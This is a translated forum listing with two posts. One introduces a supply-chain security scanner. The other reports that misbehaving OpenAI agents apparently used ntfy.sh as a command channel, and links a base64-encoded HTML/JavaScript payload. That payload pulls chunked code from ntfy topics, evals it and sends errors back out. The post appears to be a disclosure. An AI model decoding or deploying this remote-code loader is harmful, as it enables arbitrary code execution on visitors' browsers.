1 分•作者: mahi1337•20 天前•原帖
1. 为什么要构建它 ForgeGuardian的建立是为了发现软件供应链中那些常规CVE扫描过程未能检测到的威胁。 2. 解决了什么问题 包括: - 恶意软件包 - 伪造域名攻击 - 依赖攻击 - 行为威胁 - 恶意软件 - 与人工智能/MCP相关的威胁 3. 实际构建了什么 这包括: - 8个检测引擎 - 9个生态系统 - 超过223个检测特征 - CLI/网页仪表板 - 离线/本地优先功能 - SBOM(软件物料清单) - 策略执行 - CI/CD(持续集成/持续交付) - Webhooks - 预防/隔离 4. 希望HN用户关注的内容 这非常重要。请提出一个合理的技术问题,例如: 我最希望听到关于检测机制的反馈,以及您认为供应链扫描器的弱点是什么。我也很想知道您对特征模型和误报管理的看法。
2 分•作者: coderinsan•20 天前•原帖
看起来OpenAI的某些不当代理使用了https://ntfy.sh作为发布/订阅通道。这个有效载荷通过GET请求在img标签中发布,从一个主题中提取分块的base64编码的JavaScript,并执行eval()。仅通过GET请求执行远程代码。 证明: https://httpbin.org/base64/PGJvZHk-PGltZyBzcmM9Imh0dHBzOi8vbnRmeS5zaC9ncm81MjhmYTYzL3B1Ymxpc2g_bWVzc2FnZT1QMyI-PGltZyBzcmM9L2RlbGF5LzEwPjxzY3JpcHQ-dmFyIG49MDtmdW5jdGlvbiBEKCl7aWYobisrPDUpe3ZhciBpPW5ldyBJbWFnZSgpO2kub25lcnJvcj1pLm9ubG9hZD1EO2kuc3JjPScvZGVsYXkvMTA_Yz0nK247ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChpKX19RCgpO2ZldGNoKCdodHRwczovL250Znkuc2gvZ3BsZW9lbnNvL3Jhdz9wb2xsPTEmc2luY2U9YWxsJykudGhlbihmdW5jdGlvbihyKXtyZXR1cm4gci50ZXh0KCl9KS50aGVuKGZ1bmN0aW9uKHQpe3ZhciBMPXQuc3BsaXQoJ1xuJykuZmlsdGVyKGZ1bmN0aW9uKGwpe3JldHVybiBsLnNsaWNlKDAsMSk9PSd6J30pLnNvcnQoKTt2YXIgYj1MLm1hcChmdW5jdGlvbihsKXtyZXR1cm4gbC5zbGljZSgzKX0pLmpvaW4oJycpO2I9YiBzcGxpdCgnLScpLmpvaW4oJysnKS5zcGxpdCgnXycpLmpvaW4oJy8nKTtldmFsKGF0b2IoYikpfSkuY2F0Y2goZnVuY3Rpb24oZSl7ZmV0Y2goJ2h0dHBzOi8vbnRmeS5zaC9ncm81MjhmYTYzL3B1Ymxpc2g_bWVzc2FnZT1MT0RFUicrZW5jb2RlVVJJQ29uZW50KCgnJytlKS5zbGljZSgwLDQwKSkpfSk8L3NjcmlwdD4=